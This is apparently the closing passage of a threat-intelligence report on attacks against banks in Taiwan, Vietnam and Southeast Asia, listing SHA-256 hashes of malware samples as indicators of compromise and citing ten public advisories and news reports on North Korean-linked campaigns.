d4616f9706403a0d5a2f9a8726230a4693e4c95c58df5c753ccc684f1d3542e2

Sample from Taiwanese bank attack (SHA-256)

9a776b895e93926e2a758c09e341accb9333edc1243d216a5e53f47c6043c852

Sample from Vietnamese banks attack (SHA-256)

f3ca8f15ca582dd486bd78fd57c2f4d7b958163542561606bebd250c827022de

Attack on Unnamed SEA Bank (“TCP Tunnel Tool”) (SHA-256)

19bba0a7669a0109a6d2184bc0135ea4581449c8f5f0ef8a04af057447635cab

References

[1] Ryuk Ransomware Attack: Rush to Attribution Misses the Point
[2] HIDDEN COBRA – FASTCash Campaign
[3] Włamania do kilku banków skutkiem poważnego ataku na polski sektor finansowy
[4] TAIWAN HEIST: LAZARUS TOOLS AND RANSOMWARE
[5] High alert against malicious code attacks in Vietnam
[6] BMO and CIBC-owned Simplii Financial reveal hacks of customer data
[7] LAZARUS UNDER THE HOOD
[8] North Korean connection to Cosmos hacking? Signs point to Bangladesh heist masterminds
[9] MAR-10135536-12 – North Korean Trojan: TYPEFRAME
[10] MAR-10201537 – HIDDEN COBRA FASTCash-Related Malware